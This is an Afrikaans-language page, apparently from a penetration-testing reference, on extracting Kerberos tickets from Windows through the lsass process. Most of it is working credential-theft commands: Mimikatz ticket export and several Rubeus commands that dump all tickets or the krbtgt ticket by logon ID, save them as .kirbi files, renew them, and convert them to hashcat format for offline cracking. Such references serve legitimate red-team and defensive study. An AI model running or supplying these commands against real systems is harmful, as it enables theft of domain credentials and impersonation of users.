Oes van kaartjies uit Windows

Reading time: 2 minutes

Kaartjies in Windows word bestuur en gestoor deur die lsass (Local Security Authority Subsystem Service) proses, wat verantwoordelik is vir die hantering van sekuriteitsbeleide. Om hierdie kaartjies te onttrek, is dit nodig om met die lsass-proses te kommunikeer. 'n Nie-administratiewe gebruiker kan slegs toegang tot hul eie kaartjies verkry, terwyl 'n administrateur die voorreg het om alle kaartjies op die stelsel te onttrek. Vir sulke operasies word die gereedskap Mimikatz en Rubeus wyd gebruik, elk met verskillende opdragte en funksies.

Mimikatz

Mimikatz is 'n veelsydige hulpmiddel wat met Windows-sekuriteit kan kommunikeer. Dit word nie net gebruik om kaartjies te onttrek nie, maar ook vir verskeie ander sekuriteitsverwante operasies.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus is 'n hulpmiddel spesifiek ontwerp vir Kerberos-interaksie en -manipulasie. Dit word gebruik vir kaartjie-ekstraksie en -hantering, sowel as ander Kerberos-verwante aktiwiteite.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Wanneer jy hierdie opdragte gebruik, verseker dat jy plekhouers soos <BASE64_TICKET> en <luid> vervang met die werklike Base64-gecodeerde kaartjie en Aanmeld-ID onderskeidelik. Hierdie gereedskap bied uitgebreide funksionaliteit vir die bestuur van kaartjies en interaksie met die sekuriteitsmeganismes van Windows.

Verwysings

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/